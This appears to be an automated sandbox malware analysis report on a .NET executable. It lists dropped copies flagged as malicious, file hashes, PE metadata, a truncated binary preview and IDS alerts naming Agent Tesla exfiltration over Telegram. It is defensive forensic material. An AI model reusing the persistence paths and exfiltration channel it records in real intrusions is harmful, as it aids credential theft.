                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kDPmkTm.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1459
                                                                                      Entropy (8bit):5.3420905847574325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                                                                      MD5:FB4B7720101F874710FF986326F7980F
                                                                                      SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                                                                      SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                                                                      SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5829
                                                                                      Entropy (8bit):4.902247628650607
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
                                                                                      MD5:F948233D40FE29A0FFB67F9BB2F050B5
                                                                                      SHA1:9A815D3F218A9374788F3ECF6BE3445F14B414D8
                                                                                      SHA-256:C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
                                                                                      SHA-512:FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
                                                                                      Malicious:false
                                                                                      Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):15672
                                                                                      Entropy (8bit):5.555889624199822
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:OtmDGA7Tx2x+JsSBxnajilr3bsFvDNnyYr:vJ2is4xamlrIvLr
                                                                                      MD5:B6D2772CCD6974A35D4809B32671BC90
                                                                                      SHA1:CE3347922895C5D4453856BDFBFCA6714386D7A2
                                                                                      SHA-256:5791717E2F855E3A275A07B42E611B1754A198BD63CCEE7796A8EA005633B53D
                                                                                      SHA-512:C84322D61417F49F0D7ABD5A290CDA6481926356C2AA160E1BAD19C4B676C3E3B9B4637385007D965D4FB63104ED7A135EC04234F6A7CA5184D6460D34347939
                                                                                      Malicious:false
                                                                                      Preview:@...e...........7.......z...Z.U.U...r.v...]..........@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..4....................].D.E.............System.Data.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServicesH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0xd0qs05.x0o.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rnvnvtl.wmk.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fie33zp.osx.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gttgckaj.t2k.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_isna14iz.ron.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lisb23su.oum.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndva24ym.xs2.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzsrsnwb.prs.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1824768
                                                                                      Entropy (8bit):5.289569527879816
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:wBlb49Ot09OX7l348A5NyMWHqTdSoQgcld11rzA11CKKoA5+BtxCEM2D9BgEm41p:cd40xz1foxCsBAfVZa
                                                                                      MD5:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      SHA1:9E50BC56372BD9F6C8CCCF4C284BC373FDE319F0
                                                                                      SHA-256:66D51327BAB933EDA9D755EB691E584FCB324B04C573D1BE50D634C7297134F8
                                                                                      SHA-512:217D6E2DA7C7D8C0421200EE8EE9568BBDD0D4F650758F576E4E9A60225AD30A1AAF92A6617864F9BFAAAE0AF87AA6E6CE82E927C571316F96CF72B652363048
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 67%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: New_Order_M2023SI3.xls, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d............................^.... ........@.. .......................@............`.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H.......8...........F...@/..............................................N.(.....,.+.(!...+.*Ns.....-.&+......+.*.(....,...s%....-.&+.(....+.*...-.&&+.(....+.*.(....,....s?....-.&+.(....+.*....,.&&&+.(....+.*.(....,..s5....,.&+.(....+.*.(....&*.(....,..sV....-.&+.(....+.*..-.&+.(....+.*.(....,..sG....-.&+.(....+.*...-.&&+.(....+.*.(....,...s8....-.&+.(....+.*...-.&&+.(....+.*n(....,..sO....-.&+.(....+.*.(....,...s#....-.&+.(....+.*...-.&&+.(....+.*F...-.&(....+.&+.*F...-.&(...

                                                                                      C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe:Zone.Identifier

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                      C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1824768
                                                                                      Entropy (8bit):5.289569527879816
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:wBlb49Ot09OX7l348A5NyMWHqTdSoQgcld11rzA11CKKoA5+BtxCEM2D9BgEm41p:cd40xz1foxCsBAfVZa
                                                                                      MD5:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      SHA1:9E50BC56372BD9F6C8CCCF4C284BC373FDE319F0
                                                                                      SHA-256:66D51327BAB933EDA9D755EB691E584FCB324B04C573D1BE50D634C7297134F8
                                                                                      SHA-512:217D6E2DA7C7D8C0421200EE8EE9568BBDD0D4F650758F576E4E9A60225AD30A1AAF92A6617864F9BFAAAE0AF87AA6E6CE82E927C571316F96CF72B652363048
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 67%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: New_Order_M2023SI3.xls, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d............................^.... ........@.. .......................@............`.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H.......8...........F...@/..............................................N.(.....,.+.(!...+.*Ns.....-.&+......+.*.(....,...s%....-.&+.(....+.*...-.&&+.(....+.*.(....,....s?....-.&+.(....+.*....,.&&&+.(....+.*.(....,..s5....,.&+.(....+.*.(....&*.(....,..sV....-.&+.(....+.*..-.&+.(....+.*.(....,..sG....-.&+.(....+.*...-.&&+.(....+.*.(....,...s8....-.&+.(....+.*...-.&&+.(....+.*n(....,..sO....-.&+.(....+.*.(....,...s#....-.&+.(....+.*...-.&&+.(....+.*F...-.&(....+.&+.*F...-.&(...

                                                                                      C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):5.289569527879816
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      File name:PSFBGrvmxy.exe
                                                                                      File size:1824768
                                                                                      MD5:c4b59f8e80a1289b9202a33da41d7d94
                                                                                      SHA1:9e50bc56372bd9f6c8cccf4c284bc373fde319f0
                                                                                      SHA256:66d51327bab933eda9d755eb691e584fcb324b04c573d1be50d634c7297134f8
                                                                                      SHA512:217d6e2da7c7d8c0421200ee8ee9568bbdd0d4f650758f576e4e9a60225ad30a1aaf92a6617864f9bfaaae0af87aa6e6ce82e927c571316f96cf72b652363048
                                                                                      SSDEEP:24576:wBlb49Ot09OX7l348A5NyMWHqTdSoQgcld11rzA11CKKoA5+BtxCEM2D9BgEm41p:cd40xz1foxCsBAfVZa
                                                                                      TLSH:AF854CF25193FEC5D72F1D44D5083B909C00186767AC869CFCCA269793E95A4EFACAB0
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d............................^.... ........@.. .......................@............`................................

                                                                                      File Icon

                                                                                      Icon Hash:00828e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x5bed5e
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6417FB9C [Mon Mar 20 06:22:20 2023 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1bed100x4b.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c00000x600.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c20000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000x1bcd640x1bce00False0.47694610055493114data5.284655743128345IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x1c00000x6000x600False0.396484375data4.512370172683154IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x1c20000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountry
                                                                                      RT_VERSION0x1c00a00x2d4data
                                                                                      RT_MANIFEST0x1c03740x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators

                                                                                      Imports

                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      192.168.2.4149.154.167.220496974432851779 03/20/23-18:32:31.325548TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49697443192.168.2.4149.154.167.220
                                                                                      192.168.2.4149.154.167.220497004432851779 03/20/23-18:33:56.107393TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49700443192.168.2.4149.154.167.220
                                                                                      192.168.2.4149.154.167.220497024432851779 03/20/23-18:34:27.218517TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49702443192.168.2.4149.154.167.220

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
